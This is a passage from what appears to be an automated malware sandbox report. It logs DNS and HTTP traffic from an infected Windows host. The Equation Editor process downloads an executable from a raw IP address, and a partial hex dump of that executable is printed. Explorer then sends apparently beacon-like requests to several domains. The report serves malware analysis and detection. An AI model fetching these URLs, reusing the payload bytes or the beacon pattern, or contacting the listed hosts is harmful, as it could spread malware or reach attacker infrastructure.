Aug 3, 2021 16:52:12.552941084 CEST	80	49172	163.44.239.73	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 3, 2021 16:51:50.256117105 CEST	52197	53	192.168.2.22	8.8.8.8
Aug 3, 2021 16:51:50.309530020 CEST	53	52197	8.8.8.8	192.168.2.22
Aug 3, 2021 16:51:55.481079102 CEST	53099	53	192.168.2.22	8.8.8.8
Aug 3, 2021 16:51:55.519848108 CEST	53	53099	8.8.8.8	192.168.2.22
Aug 3, 2021 16:52:00.666630983 CEST	52838	53	192.168.2.22	8.8.8.8
Aug 3, 2021 16:52:00.707321882 CEST	53	52838	8.8.8.8	192.168.2.22
Aug 3, 2021 16:52:05.789819956 CEST	61200	53	192.168.2.22	8.8.8.8
Aug 3, 2021 16:52:05.987095118 CEST	53	61200	8.8.8.8	192.168.2.22
Aug 3, 2021 16:52:11.364415884 CEST	49548	53	192.168.2.22	8.8.8.8
Aug 3, 2021 16:52:11.686054945 CEST	53	49548	8.8.8.8	192.168.2.22
Aug 3, 2021 16:52:22.284992933 CEST	55627	53	192.168.2.22	8.8.8.8
Aug 3, 2021 16:52:22.342732906 CEST	53	55627	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 3, 2021 16:51:50.256117105 CEST	192.168.2.22	8.8.8.8	0x2e78	Standard query (0)	www.cleanxcare.com	A (IP address)	IN (0x0001)
Aug 3, 2021 16:51:55.481079102 CEST	192.168.2.22	8.8.8.8	0x2f03	Standard query (0)	www.iotcloud.technology	A (IP address)	IN (0x0001)
Aug 3, 2021 16:52:00.666630983 CEST	192.168.2.22	8.8.8.8	0x3c4e	Standard query (0)	www.micheldrake.com	A (IP address)	IN (0x0001)
Aug 3, 2021 16:52:05.789819956 CEST	192.168.2.22	8.8.8.8	0x6ec7	Standard query (0)	www.ruhexuangou.com	A (IP address)	IN (0x0001)
Aug 3, 2021 16:52:11.364415884 CEST	192.168.2.22	8.8.8.8	0xf09a	Standard query (0)	www.adultpeace.com	A (IP address)	IN (0x0001)
Aug 3, 2021 16:52:22.284992933 CEST	192.168.2.22	8.8.8.8	0x18f7	Standard query (0)	www.trendbold.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Aug 3, 2021 16:51:50.309530020 CEST	8.8.8.8	192.168.2.22	0x2e78	No error (0)	www.cleanxcare.com	cleanxcare.com		CNAME (Canonical name)	IN (0x0001)
Aug 3, 2021 16:51:50.309530020 CEST	8.8.8.8	192.168.2.22	0x2e78	No error (0)	cleanxcare.com		78.31.67.91	A (IP address)	IN (0x0001)
Aug 3, 2021 16:51:55.519848108 CEST	8.8.8.8	192.168.2.22	0x2f03	No error (0)	www.iotcloud.technology	iotcloud.technology		CNAME (Canonical name)	IN (0x0001)
Aug 3, 2021 16:51:55.519848108 CEST	8.8.8.8	192.168.2.22	0x2f03	No error (0)	iotcloud.technology		34.102.136.180	A (IP address)	IN (0x0001)
Aug 3, 2021 16:52:00.707321882 CEST	8.8.8.8	192.168.2.22	0x3c4e	No error (0)	www.micheldrake.com	micheldrake.com		CNAME (Canonical name)	IN (0x0001)
Aug 3, 2021 16:52:00.707321882 CEST	8.8.8.8	192.168.2.22	0x3c4e	No error (0)	micheldrake.com		192.0.78.25	A (IP address)	IN (0x0001)
Aug 3, 2021 16:52:00.707321882 CEST	8.8.8.8	192.168.2.22	0x3c4e	No error (0)	micheldrake.com		192.0.78.24	A (IP address)	IN (0x0001)
Aug 3, 2021 16:52:05.987095118 CEST	8.8.8.8	192.168.2.22	0x6ec7	No error (0)	www.ruhexuangou.com		23.82.57.32	A (IP address)	IN (0x0001)
Aug 3, 2021 16:52:11.686054945 CEST	8.8.8.8	192.168.2.22	0xf09a	No error (0)	www.adultpeace.com	adultpeace.com		CNAME (Canonical name)	IN (0x0001)
Aug 3, 2021 16:52:11.686054945 CEST	8.8.8.8	192.168.2.22	0xf09a	No error (0)	adultpeace.com		163.44.239.73	A (IP address)	IN (0x0001)
Aug 3, 2021 16:52:22.342732906 CEST	8.8.8.8	192.168.2.22	0x18f7	No error (0)	www.trendbold.com		64.190.62.111	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

13.229.216.142

www.cleanxcare.com

www.iotcloud.technology

www.micheldrake.com

www.ruhexuangou.com

www.adultpeace.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49167	13.229.216.142	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Aug 3, 2021 16:50:36.106041908 CEST	0	OUT	GET /www/dun.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 13.229.216.142 Connection: Keep-Alive
Aug 3, 2021 16:50:36.275635004 CEST	1	IN	HTTP/1.1 200 OK Date: Tue, 03 Aug 2021 14:50:43 GMT Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7 Last-Modified: Tue, 03 Aug 2021 14:09:54 GMT ETag: "146600-5c8a83d6b91fb" Accept-Ranges: bytes Content-Length: 1336832 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 d4 4c 09 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 70 10 00 00 f4 03 00 00 00 00 00 ca 8f 10 00 00 20 00 00 00 a0 10 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 14 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 78 8f 10 00 4f 00 00 00 00 a0 10 00 a0 f0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 14 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 6f 10 00 00 20 00 00 00 70 10 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 a0 f0 03 00 00 a0 10 00 00 f2 03 00 00 72 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 14 00 00 02 00 00 00 64 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 8f 10 00 00 00 00 00 48 00 00 00 02 00 05 00 4c a3 04 00 64 38 04 00 03 00 00 00 4d 08 00 06 b0 db 08 00 c8 b3 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 1d 00 00 0a 2a 26 00 02 28 1e 00 00 0a 00 2a ce 73 1f 00 00 0a 80 01 00 00 04 73 20 00 00 0a 80 02 00 00 04 73 21 00 00 0a 80 03 00 00 04 73 22 00 00 0a 80 04 00 00 04 73 23 00 00 0a 80 05 00 00 04 2a 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 24 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 25 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 26 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 27 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 28 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 29 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 2a 00 00 0a 6f 2b 00 00 0a 73 2c 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00 00 04 0a 2b 00 06 2a 22 00 02 80 07 00 00 04 2a 13 30 03 00 26 00 00 00 08 00 00 11 00 28 09 00 00 06 72 25 00 00 70 7e 07 00 00 04 6f 2d 00 00 0a 28 2e 00 00 0a 0b 07 74 24 00 00 01 0a 2b 00 06 2a 56 73 0e 00 00 06 28 2f 00 00 0a 74 06 00 00 02 80 08 00 00 04 2a 1e 02 28 30 00 00 0a 2a 13 30 01 00 0b 00 00 00 09 00 00 11 00 7e 08 00 00 04 0a Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELLaPp @ @xO H.texto p `.rsrcr@@.relocd@BHLd8M(&(ss s!s"s#0~o$+0~o%+0~o&+0~o'+0~o(+0<~(),!rp(o+s,~+0~+"0&(r%p~o-(.t$+Vs(/t(0*0~
Aug 3, 2021 16:50:36.275665045 CEST	3	IN	Data Raw: 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 09 00 00 11 00 28 0f 00 00 06 0a 2b 00 06 2a 1e 02 28 31 00 00 0a 2a 00 13 30 01 00 0b 00 00 00 0a 00 00 11 00 72 57 00 00 70 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 0a 00 00 11 00 72 b9 00 00 70 0a 2b 00 Data Ascii: +0(+(10rWp+0rp+0+6(2(01,{+,{o3(4$%0s5os5o
Aug 3, 2021 16:50:36.275685072 CEST	4	IN	Data Raw: 6f 3f 00 00 0a 00 02 6f 24 00 00 06 72 bd 01 00 70 6f 44 00 00 0a 00 02 6f 26 00 00 06 17 6f 41 00 00 0a 00 02 6f 26 00 00 06 72 43 01 00 70 22 00 00 04 41 17 19 16 73 42 00 00 0a 6f 43 00 00 0a 00 02 6f 26 00 00 06 1f 11 1f 79 73 3a 00 00 0a 6f Data Ascii: o?o$rpoDo&oAo&rCp"AsBoCo&ys:o;o&rpo<o& s=o>o&o?o&rpoDo(oAo(rCp"AsBoCo( s:o;o(rpo<
Aug 3, 2021 16:50:36.275701046 CEST	5	IN	Data Raw: 00 00 06 20 dc 00 00 00 20 1b 01 00 00 73 3a 00 00 0a 6f 3b 00 00 0a 00 02 6f 3a 00 00 06 19 6f 4d 00 00 0a 00 02 6f 3a 00 00 06 72 bd 03 00 70 6f 3c 00 00 0a 00 02 6f 3a 00 00 06 16 6f 4e 00 00 0a 00 02 6f 3a 00 00 06 1f 5a 1f 15 73 3d 00 00 0a Data Ascii: s:o;o:oMo:rpo<o:oNo:Zs=o>o:o?o:rpoOo< 6s:o;o<rpo<o<Bs=o>o<o?o<rpo@o> Ps:o;
Aug 3, 2021 16:50:36.445563078 CEST	7	IN	Data Raw: 6f 50 00 00 06 28 48 00 00 0a 6f 49 00 00 0a 00 02 6f 50 00 00 06 17 6f 4a 00 00 0a 00 02 6f 50 00 00 06 6f 4b 00 00 0a 19 8d 17 00 00 01 25 16 72 93 03 00 70 a2 25 17 72 a1 03 00 70 a2 25 18 72 af 03 00 70 a2 6f 4c 00 00 0a 00 02 6f 50 00 00 06 Data Ascii: oP(HoIoPoJoPoK%rp%rp%rpoLoP s:o;oPoMoPrpo<oPoNoPZs=o>oPo?oPrpoOoRoAoRrCp"AsBoCo
Aug 3, 2021 16:50:36.445595980 CEST	8	IN	Data Raw: 00 2a 22 02 03 7d 17 00 00 04 2a 26 02 7b 18 00 00 04 2b 00 2a 22 02 03 7d 18 00 00 04 2a 26 02 7b 19 00 00 04 2b 00 2a 00 13 30 02 00 37 00 00 00 0d 00 00 11 02 fe 06 56 00 00 06 73 59 00 00 0a 0a 02 7b 19 00 00 04 0b 07 2c 07 07 06 6f 5a 00 00 Data Ascii: "}&{+"}&{+07VsY{,oZ}{,o[&{+"}&{+"}&{+"}&{+"}&{+"}&{+"}&{ +*07
Aug 3, 2021 16:50:36.445614100 CEST	10	IN	Data Raw: 0a 28 69 00 00 0a 02 28 5e 00 00 06 2a 00 00 1b 30 02 00 31 00 00 00 0c 00 00 11 00 00 03 2c 0b 02 7b 2a 00 00 04 14 fe 03 2b 01 16 0a 06 2c 0d 02 7b 2a 00 00 04 6f 33 00 00 0a 00 00 00 de 0a 00 02 03 28 34 00 00 0a 00 dc 00 2a 00 00 00 01 10 00 Data Ascii: (i(^01,{+,{o3(4$%0(j+0Y5(rp%%X%%(k-+(.t5rpol})*0](
Aug 3, 2021 16:50:36.445630074 CEST	11	IN	Data Raw: 01 70 28 6f 00 00 0a 0a 06 72 ef 5f 01 70 28 6f 00 00 0a 0a 06 72 9c 64 01 70 28 6f 00 00 0a 0a 06 72 49 69 01 70 28 6f 00 00 0a 0a 06 72 f6 6d 01 70 28 6f 00 00 0a 0a 06 72 a3 72 01 70 28 6f 00 00 0a 0a 06 72 50 77 01 70 28 6f 00 00 0a 0a 06 72 Data Ascii: p(or_p(ordp(orIip(ormp(orrp(orPwp(or{p(orp(orWp(orp(orp(or^p(orp(orp(orep(orp(orp(orlp(orp(orp(
Aug 3, 2021 16:50:36.445646048 CEST	12	IN	Data Raw: 00 00 0a 6f fc 00 00 06 00 02 73 36 00 00 0a 6f fe 00 00 06 00 02 73 36 00 00 0a 6f 00 01 00 06 00 02 73 36 00 00 0a 6f 02 01 00 06 00 02 73 36 00 00 0a 6f 04 01 00 06 00 02 73 36 00 00 0a 6f 06 01 00 06 00 02 73 36 00 00 0a 6f 08 01 00 06 00 02 Data Ascii: os6os6os6os6os6os6os6os6os6os6os6os6os6os6os7os7os7os7o s7o"s7
Aug 3, 2021 16:50:36.445662022 CEST	14	IN	Data Raw: 43 01 00 70 22 00 00 04 41 17 19 16 73 42 00 00 0a 6f 43 00 00 0a 00 02 6f 61 00 00 06 20 6c 01 00 00 20 d3 01 00 00 73 3a 00 00 0a 6f 3b 00 00 0a 00 02 6f 61 00 00 06 72 13 12 02 70 6f 3c 00 00 0a 00 02 6f 61 00 00 06 1f 5a 1f 19 73 3d 00 00 0a Data Ascii: Cp"AsBoCoa l s:o;oarpo<oaZs=o>oa1o?oar%poFoaoGocoAocP2s:o;ocr?po<ocgs=o>oc o?ocr/poDoe
Aug 3, 2021 16:50:36.445676088 CEST	15	IN	Data Raw: 02 6f 79 00 00 06 20 bf 00 00 00 1f 25 73 3a 00 00 0a 6f 3b 00 00 0a 00 02 6f 79 00 00 06 72 a7 13 02 70 6f 3c 00 00 0a 00 02 6f 79 00 00 06 1f 2d 1f 14 73 3d 00 00 0a 6f 3e 00 00 0a 00 02 6f 79 00 00 06 1f 2e 6f 3f 00 00 0a 00 02 6f 79 00 00 06 Data Ascii: oy %s:o;oyrpo<oy-s=o>oy.o?oyr)po@o{ s:o;o{rpo<o{-s=o>o{-o?o{r)po@o} ^s:o;o}rpo<o}oEo}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49168	78.31.67.91	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 3, 2021 16:51:50.440246105 CEST	1411	OUT	GET /p2io/?dzuD7VXH=pxlxKDNxRow4YEfruB4Bv4ohCC0AYWvU81HhH938ZriMjSGbLHz+dxzd3d03S+kNJyuCfQ==&bzr8U=6lxL-0XX HTTP/1.1 Host: www.cleanxcare.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 3, 2021 16:51:50.469618082 CEST	1412	IN	HTTP/1.1 301 Moved Permanently Connection: close Content-Type: text/html Content-Length: 707 Date: Tue, 03 Aug 2021 14:51:50 GMT Location: https://www.cleanxcare.com/p2io/?dzuD7VXH=pxlxKDNxRow4YEfruB4Bv4ohCC0AYWvU81HhH938ZriMjSGbLHz+dxzd3d03S+kNJyuCfQ==&bzr8U=6lxL-0XX X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49169	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 3, 2021 16:51:55.539252996 CEST	1413	OUT	GET /p2io/?dzuD7VXH=L/l9chWXgd4NYCGd+vVro19pFM6JqqsPd4ppl3EKhtG9qh305X+esnK5qs3e0XUjSiRqvg==&bzr8U=6lxL-0XX HTTP/1.1 Host: www.iotcloud.technology Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 3, 2021 16:51:55.653333902 CEST	1414	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Tue, 03 Aug 2021 14:51:55 GMT Content-Type: text/html Content-Length: 275 ETag: "6104856e-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.22	49170	192.0.78.25	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 3, 2021 16:52:00.727487087 CEST	1415	OUT	GET /p2io/?dzuD7VXH=d2NgnqRXaD3590PSrSeXKrGILlrAeXd0mpzt/HUKTHCMsqjNpHqiPppP981n7+M4uf60sw==&bzr8U=6lxL-0XX HTTP/1.1 Host: www.micheldrake.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 3, 2021 16:52:00.747591019 CEST	1415	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 03 Aug 2021 14:52:00 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.micheldrake.com/p2io/?dzuD7VXH=d2NgnqRXaD3590PSrSeXKrGILlrAeXd0mpzt/HUKTHCMsqjNpHqiPppP981n7+M4uf60sw==&bzr8U=6lxL-0XX X-ac: 2.hhn _dfw Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.22	49171	23.82.57.32	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 3, 2021 16:52:06.176023960 CEST	1416	OUT	GET /p2io/?dzuD7VXH=WkKybY+BW5ZBczdH4hKPcEEM/Z4gp4PnllJ4lZDhA9T5haocRpsPFf0I2LnXqOHPzeGA4A==&bzr8U=6lxL-0XX HTTP/1.1 Host: www.ruhexuangou.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 3, 2021 16:52:06.352396011 CEST	1417	IN	HTTP/1.1 200 OK Server: Tengine Date: Tue, 03 Aug 2021 14:52:06 GMT Content-Type: text/html;charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Data Raw: 33 34 31 0d 0a 0a 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 73 63 72 69 70 74 3e 0a 76 61 72 20 5f 68 6d 74 20 3d 20 5f 68 6d 74 20 7c 7c 20 5b 5d 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 76 61 72 20 68 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0a 20 20 68 6d 2e 73 72 63 20 3d 20 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 64 63 34 64 64 62 66 32 62 33 66 65 65 66 64 61 35 35 37 35 30 61 66 34 34 30 35 35 30 32 31 62 22 3b 0a 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 20 0a 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 68 6d 2c 20 73 29 3b 0a 7d 29 28 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 0a 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 